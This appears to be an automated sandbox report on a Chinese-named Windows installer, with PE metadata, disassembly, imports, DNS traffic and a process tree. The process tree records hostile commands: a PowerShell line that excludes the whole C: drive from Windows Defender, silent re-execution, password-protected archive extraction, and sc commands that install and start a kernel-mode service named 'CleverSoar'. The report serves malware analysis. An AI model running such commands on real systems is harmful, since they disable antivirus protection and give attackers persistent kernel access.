SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
Malicious:false
Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.92104230937537
TrID:
• Win32 Executable (generic) a (10002005/4) 98.04%
• Inno Setup installer (109748/4) 1.08%
• InstallShield setup (43055/19) 0.42%
• Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
File name:#U5b89#U88c5#U52a9#U624b_2.0.7.exe
File size:5'695'204 bytes
MD5:b7289fd08cd04c771fd7c9b06477601a
SHA1:a5b1ad8ed22e819341cadcc8a13ea34cf8a79eb1
SHA256:a9c6e43902b74d84e8492006beaf718380a1550cfd545a2de6bfc95d69016e28
SHA512:3fa1db6989481a59d2a4c645f15f743c943e575e6ceba5eec0ddbe5bce4e394a10b1f83132385f350a139aecdbac4e78cf0d09346e46599dad7e92478071dd62
SSDEEP:98304:XwREQQxJMpnJwpVM+bJr2CsBdh/vRXIXm25Kz4j2dMwZgW:ldJmngtrg/G26XcF
TLSH:F9461213F2CBE03DE05E0B3B06B2A25494FB6A616526AD578AECB4ECCF351501D3E647
Icon Hash:0c0c2d33ceec80aa
Entrypoint:0x4a83bc
Entrypoint Section:.itext
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:1
File Version Major:6
File Version Minor:1
Subsystem Version Major:6
Subsystem Version Minor:1
Import Hash:40ab50289f7ef5fae60801f88d4541fc
Instruction
push ebp
mov ebp, esp
add esp, FFFFFFA4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-3Ch], eax
mov dword ptr [ebp-40h], eax
mov dword ptr [ebp-5Ch], eax
mov dword ptr [ebp-30h], eax
mov dword ptr [ebp-38h], eax
mov dword ptr [ebp-34h], eax
mov dword ptr [ebp-2Ch], eax
mov dword ptr [ebp-28h], eax
mov dword ptr [ebp-14h], eax
mov eax, 004A2EBCh
call 00007FE370DD9D75h
xor eax, eax
push ebp
push 004A8AC1h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 004A8A7Bh
push dword ptr fs:[edx]
                                                                                                              mov dword ptr fs:[edx], esp
                                                                                                              mov eax, dword ptr [004B0634h]
                                                                                                              call 00007FE370E6B6FBh
                                                                                                              call 00007FE370E6B24Eh
                                                                                                              lea edx, dword ptr [ebp-14h]
                                                                                                              xor eax, eax
                                                                                                              call 00007FE370E65F28h
                                                                                                              mov edx, dword ptr [ebp-14h]
                                                                                                              mov eax, 004B41F4h
                                                                                                              call 00007FE370DD3E23h
                                                                                                              push 00000002h
                                                                                                              push 00000000h
                                                                                                              push 00000001h
                                                                                                              mov ecx, dword ptr [004B41F4h]
                                                                                                              mov dl, 01h
                                                                                                              mov eax, dword ptr [0049CD14h]
                                                                                                              call 00007FE370E67253h
                                                                                                              mov dword ptr [004B41F8h], eax
                                                                                                              xor edx, edx
                                                                                                              push ebp
                                                                                                              push 004A8A27h
                                                                                                              push dword ptr fs:[edx]
                                                                                                              mov dword ptr fs:[edx], esp
                                                                                                              call 00007FE370E6B783h
                                                                                                              mov dword ptr [004B4200h], eax
                                                                                                              mov eax, dword ptr [004B4200h]
                                                                                                              cmp dword ptr [eax+0Ch], 01h
                                                                                                              jne 00007FE370E7246Ah
                                                                                                              mov eax, dword ptr [004B4200h]
                                                                                                              mov edx, 00000028h
                                                                                                              call 00007FE370E67B48h
                                                                                                              mov edx, dword ptr [004B4200h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x11000 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0xcb000 | 0x11000 | 0x11000 | 9d61959cbf275c6bf6376c85f2d2fef4 | False | 0.18784466911764705 | data | 3.7213394898806054 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xcb678 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.1174924924924925
RT_ICON | 0xcc0e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.15792682926829268
RT_ICON | 0xcc748 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23387096774193547
RT_ICON | 0xcca30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.39864864864864863
RT_ICON | 0xccb58 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | English | United States | 0.08339210155148095
RT_ICON | 0xce180 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.1023454157782516
RT_ICON | 0xcf028 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.10649819494584838
RT_ICON | 0xcf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.10838150289017341
RT_ICON | 0xcfe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8712011577424024
RT_ICON | 0xd1120 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.05668398677373642
RT_ICON | 0xd5348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.08475103734439834
RT_ICON | 0xd78f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09920262664165103
RT_ICON | 0xd8998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2047872340425532
RT_STRING | 0xd8e00 | 0x3f8 | data | | | 0.3198818897637795
RT_STRING | 0xd91f8 | 0x2dc | data | | | 0.36475409836065575
RT_STRING | 0xd94d4 | 0x430 | data | | | 0.40578358208955223
RT_STRING | 0xd9904 | 0x44c | data | | | 0.38636363636363635
RT_STRING | 0xd9d50 | 0x2d4 | data | | | 0.39226519337016574
RT_STRING | 0xda024 | 0xb8 | data | | | 0.6467391304347826
RT_STRING | 0xda0dc | 0x9c | data | | | 0.6410256410256411
RT_STRING | 0xda178 | 0x374 | data | | | 0.4230769230769231
RT_STRING | 0xda4ec | 0x398 | data | | | 0.3358695652173913
RT_STRING | 0xda884 | 0x368 | data | | | 0.3795871559633027
RT_STRING | 0xdabec | 0x2a4 | data | | | 0.4275147928994083
RT_RCDATA | 0xdae90 | 0x10 | data | | | 1.5
RT_RCDATA | 0xdaea0 | 0x310 | data | | | 0.6173469387755102
RT_RCDATA | 0xdb1b0 | 0x2c | data | | | 1.1818181818181819
RT_GROUP_ICON | 0xdb1dc | 0xbc | data | English | United States | 0.6170212765957447
RT_VERSION | 0xdb298 | 0x584 | data | English | United States | 0.2790368271954674
RT_MANIFEST | 0xdb81c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
DLL | Import
kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
comctl32.dll | InitCommonControls
user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
Name | Ordinal | Address
__dbk_fcall_wrapper | 2 | 0x40fc10
dbkFCallWrapperAddr | 1 | 0x4b063c
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 08:38:26.572391033 CET | 60129 | 53 | 192.168.2.7 | 1.1.1.1
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 08:38:26.572391033 CET | 192.168.2.7 | 1.1.1.1 | 0x42e9 | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 08:38:26.709383965 CET | 1.1.1.1 | 192.168.2.7 | 0x42e9 | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false


                                                                                                              Target ID:0
                                                                                                              Start time:02:38:20
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                              File size:55'320 bytes
                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:1
                                                                                                              Start time:02:38:21
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                                                                                                              Imagebase:0x7ff7b4ee0000
                                                                                                              File size:55'320 bytes
                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:2
                                                                                                              Start time:02:38:21
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                              Imagebase:0x7ff63dcb0000
                                                                                                              File size:329'504 bytes
                                                                                                              MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:3
                                                                                                              Start time:02:38:22
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe"
Imagebase: 0x980000
File size: 5'695'204 bytes
MD5 hash: B7289FD08CD04C771FD7C9B06477601A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Reputation: low
Has exited: true

Target ID: 5
Start time: 02:38:22
Start date: 23/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Imagebase: 0x7ff7b4ee0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 6
Start time: 02:38:22
Start date: 23/12/2024
Path: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
Wow64 process (32bit): true
Commandline: "C:\Users\user~1\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$10428,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe"
Imagebase: 0x510000
File size: 3'366'912 bytes
MD5 hash: CCFB5265302C0ED10D4EE3C9C00B07B1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 7
Start time: 02:38:23
Start date: 23/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Imagebase: 0x7ff7b4ee0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 8
Start time: 02:38:24
Start date: 23/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Imagebase: 0x110000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 02:38:24
Start date: 23/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 02:38:25
Start date: 23/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Imagebase: 0x7ff7b4ee0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 11
Start time: 02:38:29
Start date: 23/12/2024
Path: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT
Imagebase: 0x980000
File size: 5'695'204 bytes
MD5 hash: B7289FD08CD04C771FD7C9B06477601A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Has exited: false

Target ID: 12
Start time: 02:38:30
Start date: 23/12/2024
Path: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
Wow64 process (32bit): true
Commandline: "C:\Users\user~1\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$3043E,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT
Imagebase: 0x550000
File size: 3'366'912 bytes
MD5 hash: CCFB5265302C0ED10D4EE3C9C00B07B1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Borland Delphi
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited: true

Target ID: 13
Start time: 02:38:32
Start date: 23/12/2024
Path: C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase: 0x7ff7fb730000
File size: 496'640 bytes
MD5 hash: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 14
Start time: 02:38:33
Start date: 23/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Imagebase: 0x7ff6e5680000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 15
Start time: 02:38:33
Start date: 23/12/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Imagebase: 0x7ff63d0a0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 16
Start time: 02:38:33
Start date: 23/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 17
Start time: 02:38:33
Start date: 23/12/2024
Path: C:\Program Files (x86)\Windows NT\7zr.exe
Wow64 process (32bit): true
Commandline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Imagebase: 0x9b0000
File size: 831'200 bytes
MD5 hash: 84DC4B92D860E8AEA55D12B1E87EA108
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited: true

Target ID: 18
Start time: 02:38:33
Start date: 23/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 19
Start time: 02:38:34
Start date: 23/12/2024
Path: C:\Program Files (x86)\Windows NT\7zr.exe
Wow64 process (32bit): true
Commandline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Imagebase: 0x9b0000
File size: 831'200 bytes
MD5 hash: 84DC4B92D860E8AEA55D12B1E87EA108
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 20
Start time: 02:38:34
Start date: 23/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff75da10000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 21
Start time: 02:38:34
Start date: 23/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd /c start sc start CleverSoar
Imagebase: 0x7ff6e5680000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 02:38:34
Start date: 23/12/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: sc start CleverSoar
Imagebase: 0x7ff63d0a0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:23
                                                                                                              Start time:02:38:34
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:24
                                                                                                              Start time:02:38:34
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:25
                                                                                                              Start time:02:38:34
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:26
                                                                                                              Start time:02:38:34
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:27
                                                                                                              Start time:02:38:34
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:cmd /c start sc start CleverSoar
                                                                                                              Imagebase:0x7ff6e5680000
                                                                                                              File size:289'792 bytes
                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:28
                                                                                                              Start time:02:38:34
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\sc.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:sc start CleverSoar
                                                                                                              Imagebase:0x7ff63d0a0000
                                                                                                              File size:72'192 bytes
                                                                                                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:29
                                                                                                              Start time:02:38:34
                                                                                                              Start date:23/12/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff75da10000
                                                                                                              File size:862'208 bytes
